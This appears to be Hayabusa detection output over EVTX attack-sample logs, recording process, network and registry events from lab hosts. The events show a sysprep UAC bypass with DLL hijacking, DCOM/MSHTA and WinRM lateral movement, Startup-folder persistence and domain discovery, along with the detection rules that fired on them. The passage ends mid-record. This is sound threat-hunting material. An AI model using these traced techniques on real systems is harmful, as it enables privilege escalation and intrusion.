365ABB72-B167-5CD9-0000-00109D240C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:03:21.212 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49159 (IEWIN7) | Dst: 151.101.128.133:443 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\regsvr32.exe | PID: 2476 | PGUID: 365ABB72-B167-5CD9-0000-001062160C00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:03:21.212 +09:00,IEWIN7,3,high,Exec | Evas,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:05:18.692 +09:00,IEWIN7,1,info,,Process Created,Cmd: wmiadap.exe /F /T /R | Process: C:\Windows\System32\wbem\WMIADAP.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x3e7 | PID: 1188 | PGUID: 365ABB72-B1DE-5CD9-0000-0010715B0D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 09:29:52.744 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.16:49158 (IEWIN7) | Dst: 10.0.2.17:58172 () | User: IEWIN7\IEUser | Process: C:\Windows\explorer.exe | PID: 2824 | PGUID: 365ABB72-0BAC-5CDA-0000-0010C5940300,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_DCOM_ShellBrowserWindow_ShellWindows.evtx +2019-05-14 09:32:22.775 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.16:49158 (IEWIN7) | Dst: 10.0.2.17:55099 () | User: IEWIN7\IEUser | Process: C:\Windows\explorer.exe | PID: 2824 | PGUID: 
365ABB72-0BAC-5CDA-0000-0010C5940300,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_DCOM_ShellBrowserWindow_ShellWindows.evtx +2019-05-14 09:32:36.775 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.16:49158 (IEWIN7) | Dst: 10.0.2.17:55101 () | User: IEWIN7\IEUser | Process: C:\Windows\explorer.exe | PID: 2824 | PGUID: 365ABB72-0BAC-5CDA-0000-0010C5940300,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_DCOM_ShellBrowserWindow_ShellWindows.evtx +2019-05-14 10:29:04.306 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\System32\mshta.exe -Embedding | Process: C:\Windows\System32\mshta.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x1070ce | PID: 1932 | PGUID: 365ABB72-19E0-5CDA-0000-001006711000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx +2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,Exec,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx +2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx +2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,Evas,MSHTA Spwaned by SVCHOST,,rules/sigma/process_creation/proc_creation_win_lethalhta.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx +2019-05-14 10:29:05.534 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.16:49168 (IEWIN7) | Dst: 10.0.2.17:55683 () | User: IEWIN7\IEUser | Process: 
C:\Windows\System32\mshta.exe | PID: 1932 | PGUID: 365ABB72-19E0-5CDA-0000-001006711000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx +2019-05-14 11:32:48.290 +09:00,IEWIN7,10,low,,Process Access,Src Process: | Tgt Process: C:\Windows\system32\whoami.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2016 | Src PGUID: 365ABB72-28A0-5CDA-0000-001074181300 | Tgt PID: 2676 | Tgt PGUID: 365ABB72-28D0-5CDA-0000-00103A6B1300,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.290 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\whoami.exe"" /groups | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13587 | PID: 2676 | PGUID: 365ABB72-28D0-5CDA-0000-00103A6B1300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.290 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.290 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.290 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.359 +09:00,IEWIN7,10,low,,Process 
Access,Src Process: | Tgt Process: C:\Windows\system32\whoami.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2016 | Src PGUID: 365ABB72-28A0-5CDA-0000-001074181300 | Tgt PID: 3964 | Tgt PGUID: 365ABB72-28D0-5CDA-0000-0010F76F1300,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.359 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.359 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\whoami.exe"" /groups | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13587 | PID: 3964 | PGUID: 365ABB72-28D0-5CDA-0000-0010F76F1300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.359 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.359 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.143 +09:00,IEWIN7,1,info,,Process Created,Cmd: consent.exe 968 288 03573528 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x3e7 | PID: 3776 | PGUID: 
365ABB72-28D3-5CDA-0000-0010B08B1300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.453 +09:00,IEWIN7,10,low,,Process Access,Src Process: | Tgt Process: C:\Windows\System32\sysprep\sysprep.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2016 | Src PGUID: 365ABB72-28A0-5CDA-0000-001074181300 | Tgt PID: 1020 | Tgt PGUID: 365ABB72-28D3-5CDA-0000-001019AA1300,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.453 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.453 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\sysprep\sysprep.exe"" | Process: C:\Windows\System32\sysprep\sysprep.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13587 | PID: 1020 | PGUID: 365ABB72-28D3-5CDA-0000-001019AA1300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.470 +09:00,IEWIN7,10,low,,Process Access,Src Process: | Tgt Process: C:\Windows\System32\sysprep\sysprep.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2016 | Src PGUID: 365ABB72-28A0-5CDA-0000-001074181300 | Tgt PID: 2768 | Tgt PGUID: 365ABB72-28D3-5CDA-0000-00106FAA1300,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.470 +09:00,IEWIN7,1,info,,Process Created,"Cmd: 
""C:\Windows\System32\sysprep\sysprep.exe"" ""C:\Windows\System32\sysprep\sysprep.exe"" | Process: C:\Windows\System32\sysprep\sysprep.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13587 | PID: 2768 | PGUID: 365ABB72-28D3-5CDA-0000-00106FAA1300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.470 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.487 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\explorer.exe | Tgt Process: C:\Windows\System32\sysprep\sysprep.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2016 | Src PGUID: 365ABB72-28A0-5CDA-0000-001074181300 | Tgt PID: 572 | Tgt PGUID: 365ABB72-28D3-5CDA-0000-00103BAC1300,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.487 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\sysprep\sysprep.exe"" | Process: C:\Windows\System32\sysprep\sysprep.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13587 | PID: 572 | PGUID: 365ABB72-28D3-5CDA-0000-00103BAC1300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.487 +09:00,IEWIN7,1,info,,Process Created,Cmd: consent.exe 968 312 0197CDB0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x3e7 | PID: 3388 | PGUID: 
365ABB72-28D3-5CDA-0000-001055AD1300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.814 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\sysprep\sysprep.exe"" | Process: C:\Windows\System32\sysprep\sysprep.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13545 | PID: 3068 | PGUID: 365ABB72-28D3-5CDA-0000-00106DC31300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.831 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Possible UAC Bypass - mcx2prov DLL | Image: C:\Windows\System32\sysprep\cryptbase.dll | Process: C:\Windows\System32\sysprep\sysprep.exe | Company: Yokai Ltd. | Signed: false | Signature: Unavailable | PID: 3068 | PGUID: 365ABB72-28D3-5CDA-0000-00106DC31300 | Hash: SHA1=4DA0DCAD144039F6DD7739E37AB3A7B78FB86B4D,MD5=2BA4BC4753A29D56AA185C972CA1023E,SHA256=A6BE522A1FC48B391EFCB3A3CFE49560A455F1BB853505F7E9ACCA8EDF116B4C,IMPHASH=380A21A3D5988707B0CFE7CA5B1C7E0B",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.831 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\sysprep\sysprep.exe"" | LID: 0x13545 | PID: 3976 | PGUID: 365ABB72-28D3-5CDA-0000-001088C71300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.831 +09:00,IEWIN7,1,low,Exec,Non Interactive 
PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 23:03:45.100 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_sysmon.exe_10b542d1f1b162e715ed4ef4ccd38dc6e1393c_7bfbbfce_09c49153\Report.wer.tmp | Process: C:\Windows\system32\RunDll32.exe | PID: 3596 | PGUID: ECAD0485-CA56-5CDA-0000-00102DE71000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx +2019-05-14 23:04:05.697 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\Users\administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cmd.exe | Process: C:\Windows\system32\mstsc.exe | PID: 2580 | PGUID: ECAD0485-C903-5CDA-0000-0010340F1000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx +2019-05-14 23:04:05.697 +09:00,alice.insecurebank.local,11,high,C2,Hijack Legit RDP Session to Move Laterally,,rules/sigma/file_event/sysmon_tsclient_filewrite_startup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx +2019-05-14 23:04:06.339 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_sysmon.exe_10b542d1f1b162e715ed4ef4ccd38dc6e1393c_7bfbbfce_09cc920e\Report.wer.tmp | Process: C:\Windows\system32\RunDll32.exe | PID: 3596 | PGUID: ECAD0485-CA56-5CDA-0000-00102DE71000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx +2019-05-14 23:04:28.860 +09:00,alice.insecurebank.local,11,info,,File Created,Path: 
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_sysmon.exe_10b542d1f1b162e715ed4ef4ccd38dc6e1393c_7bfbbfce_09e09039\Report.wer.tmp | Process: C:\Windows\system32\RunDll32.exe | PID: 3596 | PGUID: ECAD0485-CA56-5CDA-0000-00102DE71000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx +2019-05-15 02:17:26.440 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49583 (alice.insecurebank.local) | Dst: 10.59.4.11:389 (DC1) | User: insecurebank\Administrator | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 4092 | PGUID: ECAD0485-F2EC-5CDA-0000-0010F1631500,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-15 02:17:26.440 +09:00,alice.insecurebank.local,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-15 02:17:26.738 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49584 (alice.insecurebank.local) | Dst: 10.59.4.11:389 (DC1) | User: insecurebank\Administrator | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 4092 | PGUID: ECAD0485-F2EC-5CDA-0000-0010F1631500,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-15 02:17:26.738 +09:00,alice.insecurebank.local,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-15 02:17:38.250 
+09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49586 (alice.insecurebank.local) | Dst: 10.59.4.24:445 (edward) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49587 (alice.insecurebank.local) | Dst: 10.59.4.21:445 (bob) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49588 (alice.insecurebank.local) | Dst: 10.59.4.22:445 (CHARLES) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49589 (alice.insecurebank.local) | Dst: 10.59.4.25:445 (FRED) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49590 (alice.insecurebank.local) | Dst: 10.59.4.11:445 (DC1) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 
ECAD0485-EC1E-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49592 (alice.insecurebank.local) | Dst: 10.59.4.23:445 (dave) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49593 (alice.insecurebank.local) | Dst: 10.59.4.12:445 (DEV_SERVER) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-15 02:31:27.973 +09:00,DC1.insecurebank.local,18,info,,Pipe Connected,\srvsvc | Process: System | PID: 4 | PGUID: DFAE8213-F1B5-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_18_Invoke_UserHunter_NetSessionEnum_DC-srvsvc.evtx +2019-05-15 02:42:52.833 +09:00,DC1.insecurebank.local,18,info,,Pipe Connected,\srvsvc | Process: System | PID: 4 | PGUID: DFAE8213-F1B5-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_enum_shares_target_sysmon_3_18.evtx +2019-05-15 02:42:52.848 +09:00,DC1.insecurebank.local,18,info,,Pipe Connected,\srvsvc | Process: System | PID: 4 | PGUID: 
DFAE8213-F1B5-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_enum_shares_target_sysmon_3_18.evtx +2019-05-15 02:42:53.854 +09:00,DC1.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.11:445 (DC1.insecurebank.local) | Dst: 10.59.4.20:49304 (ALICE) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: DFAE8213-F1B5-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_enum_shares_target_sysmon_3_18.evtx +2019-05-15 02:43:03.888 +09:00,DC1.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.11:445 (DC1.insecurebank.local) | Dst: 10.59.4.20:49306 (ALICE) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: DFAE8213-F1B5-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_enum_shares_target_sysmon_3_18.evtx +2019-05-15 13:18:40.474 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Defense Evasion - access to the VBA project object model in the Macro Settings changed | SetValue: HKU\S-1-5-21-3583694148-1414552638-2922671848-1000\Software\Microsoft\Office\16.0\Excel\Security\AccessVBOM: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 3804 | PGUID: 365ABB72-92DF-5CDB-0000-0010A15E1300,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_sysmon_13_VBA_Security_AccessVBOM.evtx +2019-05-15 13:18:40.474 +09:00,IEWIN7,13,high,Evas,Office Security Settings Changed,,rules/sigma/registry_event/sysmon_reg_office_security.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_sysmon_13_VBA_Security_AccessVBOM.evtx +2019-05-16 10:31:36.426 +09:00,DC1.insecurebank.local,1,info,,Process Created,Cmd: C:\Windows\system32\WinrsHost.exe -Embedding | 
Process: C:\Windows\System32\winrshost.exe | User: insecurebank\Administrator | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x12fe05 | PID: 3948 | PGUID: DFAE8213-BD78-5CDC-0000-0010C7FE1200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx +2019-05-16 10:31:36.454 +09:00,DC1.insecurebank.local,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.exe /C ipconfig | Process: C:\Windows\System32\cmd.exe | User: insecurebank\Administrator | Parent Cmd: C:\Windows\system32\WinrsHost.exe -Embedding | LID: 0x12fe05 | PID: 3136 | PGUID: DFAE8213-BD78-5CDC-0000-001091041300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx +2019-05-16 10:31:36.456 +09:00,DC1.insecurebank.local,1,info,,Process Created,Cmd: ipconfig | Process: C:\Windows\System32\ipconfig.exe | User: insecurebank\Administrator | Parent Cmd: C:\Windows\system32\cmd.exe /C ipconfig | LID: 0x12fe05 | PID: 1744 | PGUID: DFAE8213-BD78-5CDC-0000-001074051300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx +2019-05-16 10:38:19.630 +09:00,DC1.insecurebank.local,1,high,,Process Created_Sysmon Alert,"Lateral Movement - Windows Remote Management | Cmd: ""C:\Windows\system32\HOSTNAME.EXE"" | Process: C:\Windows\System32\HOSTNAME.EXE | User: insecurebank\Administrator | Parent Cmd: C:\Windows\system32\wsmprovhost.exe -Embedding | LID: 0x15daaf | PID: 2936 | PGUID: DFAE8213-BF0B-5CDC-0000-00105A951600 | Hash: 
